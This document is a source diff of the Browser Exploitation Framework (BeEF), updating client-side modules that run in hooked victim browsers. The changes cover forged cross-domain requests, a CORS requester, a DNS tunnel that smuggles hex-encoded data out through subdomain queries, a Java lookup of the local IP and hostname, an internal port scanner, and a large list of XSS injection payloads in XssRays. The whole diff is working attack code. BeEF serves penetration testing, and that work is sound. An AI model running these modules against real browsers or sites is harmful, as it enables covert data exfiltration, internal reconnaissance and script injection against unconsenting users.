        }
    },

    /**
-     *Performs http requests
+     * Performs http requests
     * @param: {String} scheme: HTTP or HTTPS
     * @param: {String} method: GET or POST
     * @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -143,20 +191,20 @@ beef.net = {
     *
     * @return: {Object} response: this object contains the response details
     */
-    request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
+    request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
        //check if same domain or cross domain
        var cross_domain = true;
-        if (document.domain == domain){
-            if(document.location.port == "" || document.location.port == null){
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+            if (document.location.port == "" || document.location.port == null) {
                cross_domain = !(port == "80" || port == "443");
            }
        }

        //build the url
        var url = "";
-        if(path.indexOf("http://") != -1 || path.indexOf("https://") != -1){
+        if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
            url = path;
-        }else{
+        } else {
            url = scheme + "://" + domain;
            url = (port != null) ? url + ":" + port : url;
            url = (path != null) ? url + path : url;
@@ -168,21 +216,33 @@ beef.net = {
        response.was_cross_domain = cross_domain;
        var start_time = new Date().getTime();

+        /*
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
+         * This will turn POSTs into GETs for remote-domain requests.
+         */
+        if (method == "POST") {
+            $j.ajaxSetup({
+                dataType: dataType
+            });
+        } else {
+            $j.ajaxSetup({
+                dataType: 'script'
+            });
+        }
+
        //build and execute the request
        $j.ajax({type: method,
-            dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server
            url: url,
            data: data,
            timeout: (timeout * 1000),

-            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
-            beforeSend: function(xhr) {
-                if(method == "POST"){
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
+            beforeSend: function (xhr) {
+                if (method == "POST") {
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                }
            },
-
-            success: function(data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
                response.status_text = textStatus;
@@ -191,14 +251,14 @@ beef.net = {
                response.was_timedout = false;
                response.duration = (end_time - start_time);
            },
-            error: function(jqXHR, textStatus, errorThrown) {
+            error: function (jqXHR, textStatus, errorThrown) {
                var end_time = new Date().getTime();
                response.response_body = jqXHR.responseText;
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.duration = (end_time - start_time);
            },
-            complete: function(jqXHR, textStatus) {
+            complete: function (jqXHR, textStatus) {
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.headers = jqXHR.getAllResponseHeaders();
@@ -213,31 +273,35 @@ beef.net = {
                    response.port_status = "open";
                }
            }
-        }).done(function() {
-            if (callback != null) {
-                callback(response);
-            }
-        });
+        }).done(function () {
+                if (callback != null) {
+                    callback(response);
+                }
+            });
        return response;
    },

    /*
-     * Similar to this.request, except from a few things that are needed when dealing with forged requests:
+     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
     *  - requestid: needed on the callback
     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *
+     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
     */
-    forge_request: function(scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {

        // check if same domain or cross domain
        var cross_domain = true;
-        if (document.domain == domain) {
-           if(document.location.port == "" || document.location.port == null){
-              cross_domain = !(port == "80" || port == "443");
-           } else {
-              if (document.location.port == port) cross_domain = false;
-           }
+        if (domain == "undefined" || path == "undefined") {
+            return;
+        }
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+            if (document.location.port == "" || document.location.port == null) {
+                cross_domain = !(port == "80" || port == "443");
+            } else {
+                if (document.location.port == port) cross_domain = false;
+            }
        }
-
        // build the url
        var url = "";
        if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
@@ -261,35 +325,45 @@ beef.net = {
            response.status_text = "crossdomain";
            response.port_status = "crossdomain";
            response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
-			response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
+            response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
            callback(response, requestid);
            return response;
        }

-        // build and execute the request
-        if (method == "POST"){
-          $j.ajaxSetup({
-              data: data
-          });
+        /*
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
+         * This will turn POSTs into GETs for remote-domain requests.
+         */
+        if (method == "POST") {
+            $j.ajaxSetup({
+                dataType: dataType
+            });
+        } else {
+            $j.ajaxSetup({
+                dataType: 'script'
+            });
+        }
+
+        // this is required for bugs in IE so data can be transferred back to the server
+        if (beef.browser.isIE()) {
+            dataType = 'script'
        }

        $j.ajax({type: method,
-            dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
+            dataType: dataType,
            url: url,
            headers: headers,
            timeout: (timeout * 1000),

-            // needed otherwise jQuery always adds:
-            // Content-type: application/xml
-            // even if data is populated
-            beforeSend: function(xhr) {
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
+            beforeSend: function (xhr) {
                if (method == "POST") {
-                   xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
+                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                }
            },

            // http server responded successfully
-            success: function(data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
                response.status_text = textStatus;
@@ -300,7 +374,7 @@ beef.net = {

            // server responded with a http error (403, 404, 500, etc)
            // or server is not a http server
-            error: function(xhr, textStatus, errorThrown) {
+            error: function (xhr, textStatus, errorThrown) {
                var end_time = new Date().getTime();
                response.response_body = xhr.responseText;
                response.status_code = xhr.status;
@@ -308,14 +382,34 @@ beef.net = {
                response.duration = (end_time - start_time);
            },

-            complete: function(xhr, textStatus) {
+            complete: function (xhr, textStatus) {
                // cross-domain request
                if (cross_domain) {
-                    response.status_code = -1;
-                    response.status_text = "crossdomain";
+
                    response.port_status = "crossdomain";
-                    response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-                    response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+
+                    if (xhr.status != 0) {
+                        response.status_code = xhr.status;
+                    } else {
+                        response.status_code = -1;
+                    }
+
+                    if (textStatus) {
+                        response.status_text = textStatus;
+                    } else {
+                        response.status_text = "crossdomain";
+                    }
+
+                    if (xhr.getAllResponseHeaders()) {
+                        response.headers = xhr.getAllResponseHeaders();
+                    } else {
+                        response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
+
+                    if (!response.response_body) {
+                        response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
+
                } else {
                    // same-domain request
                    response.status_code = xhr.status;
@@ -327,8 +421,16 @@ beef.net = {
                        response.was_timedout = true;
                        response.response_body = "ERROR: Timed out\n";
                        response.port_status = "closed";
+                        /*
+                         * With IE we need to explicitly set the dataType to "script",
+                         * so there will be always parse-errors if the content is != javascript
+                         * */
                    } else if (textStatus == "parsererror") {
                        response.port_status = "not-http";
+                        if (beef.browser.isIE()) {
+                            response.status_text = "success";
+                            response.port_status = "open";
+                        }
                    } else {
                        response.port_status = "open";
                    }
@@ -341,7 +443,7 @@ beef.net = {

    //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
    //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
-    clean: function(r) {
+    clean: function (r) {
        if (this.array_has_string_key(r)) {
            var obj = {};
            for (var key in r)
@@ -352,7 +454,7 @@ beef.net = {
    },

    //Detects if an array has a string key
-    array_has_string_key: function(arr) {
+    array_has_string_key: function (arr) {
        if ($j.isArray(arr)) {
            try {
                for (var key in arr)
@@ -363,8 +465,10 @@ beef.net = {
        return false;
    },

-    //Sends back browser details to framework
-    browser_details: function() {
+    /**
+     * Sends back browser details to framework, calling beef.browser.getDetails()
+     */
+    browser_details: function () {
        var details = beef.browser.getDetails();
        details['HookSessionID'] = beef.session.get_hook_session_id();
        this.send('/init', 0, details);
--- a/core/main/client/net/cors.js
+++ b/core/main/client/net/cors.js
@@ -0,0 +1,77 @@
+beef.net.cors = {
+
+  handler: "cors",
+
+    /**
+     * Response Object - used in the beef.net.request callback
+     */
+    response:function () {
+        this.status  = null;      // 500, 404, 200, 302, etc
+        this.headers = null;      // full response headers
+        this.body    = null;      // full response body
+    },
+
+    /**
+     * Make a cross-origin request using CORS
+     *
+     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
+     * @param url {String} url
+     * @param data {String} request body
+     * @param callback {Function} function to callback on completion
+     */
+    request: function(method, url, data, callback) {
+
+    var xhr;
+    var response = new this.response;
+
+    if (XMLHttpRequest) {
+        xhr = new XMLHttpRequest();
+
+        if ('withCredentials' in xhr) {
+            xhr.open(method, url, true);
+            xhr.onerror = function() {
+            };
+            xhr.onreadystatechange = function() {
+                if (xhr.readyState === 4) {
+                    response.headers = this.getAllResponseHeaders()
+                    response.body    = this.responseText;
+                    response.status  = this.status;
+                    if (!!callback) {
+                        if (!!response) {
+                            callback(response);
+                        } else { 
+                            callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                        }
+                    }
+                }
+            };
+            xhr.send(data);
+        }
+    } else if (typeof XDomainRequest != "undefined") {
+        xhr = new XDomainRequest();
+        xhr.open(method, url);
+        xhr.onerror = function() {
+        };
+        xhr.onload = function() {
+            response.headers = this.getAllResponseHeaders()
+            response.body    = this.responseText;
+            response.status  = this.status;
+            if (!!callback) {
+                if (!!response) {
+                    callback(response);
+                } else {
+                    callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                }
+            }
+        };
+        xhr.send(data);
+    } else {
+        if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
+    }
+
+    }
+
+};
+
+beef.regCmp('beef.net.cors');
+
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net.dns
 * 
@@ -27,49 +18,70 @@ beef.net.dns = {

 	handler: "dns",

-	send: function(msgId, messageString, domain, wait, callback) {
+	send: function(msgId, data, domain, callback) {

-		var dom = document.createElement('b');
+        var encode_data = function(str) {
+            var result="";
+            for(i=0;i<str.length;++i) {
+                result+=str.charCodeAt(i).toString(16).toUpperCase();
+            }
+            return result;
+        };

-		// DNS settings
-		var max_domain_length = 255-5-5-5-5-5;
-		var max_segment_length = max_domain_length - domain.length;
+        var encodedData = encodeURI(encode_data(data));

-		// splits strings into chunks
-		String.prototype.chunk = function(n) {
-			if (typeof n=='undefined') n=100;
-			return this.match(RegExp('.{1,'+n+'}','g'));
-		};
+        //TODO remove this
+        console.log(encodedData);
+        console.log("_encodedData_ length: " + encodedData.length);

-		// XORs a string
-		xor_encrypt = function(str, key) {
-			var result="";
-			for(i=0;i<str.length;++i) {
-				result+=String.fromCharCode(key^str.charCodeAt(i));
-			}
-			return result;
-		};
+        // limitations to DNS according to RFC 1035:
+        // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
+        // o Domain names are limited to 255 characters in length (including dots)
+        // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
+        // o Subdomains are limited to 63 characters in length (including the trailing dot)

-		// sends a DNS request
-		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
-			var img = new Image;
-			img.src = "http://"+query;
-			img.onload = function() { dom.removeChild(this); }
-			img.onerror = function() { dom.removeChild(this); }
-			dom.appendChild(img);
-		}
+        // DNS request structure:
+        // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
+      //max_length: 3.   3   .   3   . 63 . x

-		// encode message
-		var xor_key = Math.floor(Math.random()*99000+1000);
-		encoded_message = encodeURI(xor_encrypt(messageString, xor_key)).replace(/%/g,".");
+        // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
+        // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
+        var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
+        var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
+        var max_data_segment_length = 63; // by RFC

-		// Split message into segments
-		segments = encoded_message.chunk(max_segment_length)
-		for (seq=1; seq<=segments.length; seq++) {
-			// send segment
-			sendQuery(msgId+"."+seq+"."+segments.length+"."+xor_key+segments[seq-1]+"."+domain);
-		}
+        //TODO remove this
+        console.log("max_data_segment_length: " + max_data_segment_length);
+
+        var dom = document.createElement('b');
+
+        String.prototype.chunk = function(n) {
+            if (typeof n=='undefined') n=100;
+            return this.match(RegExp('.{1,'+n+'}','g'));
+        };
+
+        var sendQuery = function(query) {
+            var img = new Image;
+            //img.src = "http://"+query;
+            img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
+            img.onload = function() { dom.removeChild(this); }
+            img.onerror = function() { dom.removeChild(this); }
+            dom.appendChild(img);
+
+            //experimental
+            //setTimeout(function(){dom.removeChild(img)},1000);
+        };
+
+        var segments = encodedData.chunk(max_data_segment_length);
+
+        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
+
+        //TODO remove this
+        console.log(segments.length);
+
+        for (var seq=1; seq<=segments.length; seq++) {
+            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
+        }

 		// callback - returns the number of queries sent
 		if (!!callback) callback(segments.length);
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net.local
 * 
@@ -21,6 +12,8 @@
 beef.net.local = {
 	
 	sock: false,
+	checkJava: false,
+	hasJava: false,
 	
 	/**
 	 * Initializes the java socket. We have to use this method because
@@ -29,16 +22,30 @@ beef.net.local = {
 	 * is invalid:
 	 * sock: new java.net.Socket();
 	 */
+
 	initializeSocket: function() {
-		if(! beef.browser.hasJava()) return -1;
-		
-		try {
-			this.sock = new java.net.Socket();
-		} catch(e) {
-			return -1;
+		if(this.checkJava){	
+			if(!beef.browser.hasJava()) {
+				this.checkJava=True;
+				this.hasJava=False;
+				return -1;
+			}else{
+				this.checkJava=True;
+				this.hasJava=True;
+				return 1;
+			}
+		}
+		else{
+			if(!this.hasJava) return -1;
+			else{	
+				try {
+					this.sock = new java.net.Socket();
+				} catch(e) {
+					return -1;
+				}
+				return 1;
+			}
 		}
-		
-		return 1;
 	},
 	
 	/**
@@ -47,7 +54,7 @@ beef.net.local = {
 	 * @error: return -1 if the internal ip cannot be retrieved.
 	 */
 	getLocalAddress: function() {
-		if(! beef.browser.hasJava()) return false;
+		if(!this.hasJava) return false;
 		
 		this.initializeSocket();
 		
@@ -65,7 +72,7 @@ beef.net.local = {
 	 * @error: return -1 if the hostname cannot be retrieved.
 	 */
 	getLocalHostname: function() {
-		if(! beef.browser.hasJava()) return false;
+		if(!this.hasJava) return false;
 		
 		this.initializeSocket();
 		
@@ -79,4 +86,4 @@ beef.net.local = {
 	
 };

-beef.regCmp('beef.net.local');
+beef.regCmp('beef.net.local');
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,63 +1,54 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.net.portscanner
- * 
- * Provides port scanning functions for the zombie. A mod of pdp's scanner
- * 
- * Version: '0.1',
- * author: 'Petko Petkov',
- * homepage: 'http://www.gnucitizen.org'
- */
-
-beef.net.portscanner = {
-
-		scanPort: function(callback, target, port, timeout) 
-		{
-			var timeout = (timeout == null)?100:timeout;
-			var img = new Image();
-
-			img.onerror = function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'open');
-			};
-
-			img.onload  = img.onerror;
-			
-			img.src = 'http://' + target + ':' + port;
-
-			setTimeout(function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'closed');
-			}, timeout);
-
-		},
-
-		scanTarget: function(callback, target, ports_str, timeout)
-		{
-			var ports = ports_str.split(",");
-
-			for (index = 0; index < ports.length; index++) {
-				this.scanPort(callback, target, ports[index], timeout);
-			};
-
-		}
-};
-
-beef.regCmp('beef.net.portscanner');
-
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.net.portscanner
+ * 
+ * Provides port scanning functions for the zombie. A mod of pdp's scanner
+ * 
+ * Version: '0.1',
+ * author: 'Petko Petkov',
+ * homepage: 'http://www.gnucitizen.org'
+ */
+
+beef.net.portscanner = {
+
+		scanPort: function(callback, target, port, timeout) 
+		{
+			var timeout = (timeout == null)?100:timeout;
+			var img = new Image();
+
+			img.onerror = function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'open');
+			};
+
+			img.onload  = img.onerror;
+			
+			img.src = 'http://' + target + ':' + port;
+
+			setTimeout(function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'closed');
+			}, timeout);
+
+		},
+
+		scanTarget: function(callback, target, ports_str, timeout)
+		{
+			var ports = ports_str.split(",");
+
+			for (index = 0; index < ports.length; index++) {
+				this.scanPort(callback, target, ports[index], timeout);
+			};
+
+		}
+};
+
+beef.regCmp('beef.net.portscanner');
+
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net.requester
 * 
@@ -28,8 +19,7 @@ beef.net.requester = {
 	handler: "requester",
 	
 	send: function(requests_array) {
-
-        for (i in requests_array) {
+        for(var i=0; i<requests_array.length; i++){
            request = requests_array[i];

            beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
@@ -41,8 +31,6 @@ beef.net.requester = {
                                           response_headers: res.headers});
                                       }
                                 );
-
-
        }
    }
 };
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -49,20 +49,25 @@ beef.net.xssrays = {
    //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
    vectors: [

-//				  {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
-//        {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
-        {input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
-		{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//        {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
-        //{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
+  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
+  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
    ],
    uniqueID: 0,
    rays: [],
@@ -99,8 +104,8 @@ beef.net.xssrays = {

    // util function. Print string to the console only if the debug flag is on and the browser is not IE.
    printDebug:function(log) {
-        if (this.debug && !beef.browser.isIE()) {
-            console.log("[XssRays] " + log);
+        if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
+            beef.debug("[XssRays] " + log);
        }
    },

@@ -181,6 +186,13 @@ beef.net.xssrays = {
                if (target.search.length > 0) {
                    target.search = target.search.slice(1);
                    target.search = target.search.split(/&|&amp;/);
+
+                    if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
+                       var pathname = "/" + target.pathname;
+                    }else{
+                        var pathname = target.pathname;
+                    }
+
                    var params = {};
                    for (var i = 0; i < target.search.length; i++) {
                        target.search[i] = target.search[i].split('=');
@@ -197,20 +209,20 @@ beef.net.xssrays = {
                        }
                        if (this.vectors[i].url) {
                            if (target.port == null || target.port == "") {
-                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], params, true);//params
+                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
                            } else {
-                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], params, true);//params
+                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
                            }
                        }
                        if (this.vectors[i].path) {
                            if (target.port == null || target.port == "") {
-                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], null, true);//paths
+                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
                            } else {
-                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], null, true);//paths
+                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
                            }
                        }
                    }
@@ -308,7 +320,10 @@ beef.net.xssrays = {
            var ray = this.rays[beef.net.xssrays.uniqueID];

            var paramsPos = 0;
-            if (params != null) { // check for XSS in GET parameters
+            if (params != null) {
+                /*
+                 * ++++++++++ check for XSS in URI parameters (GET) ++++++++++
+                 */
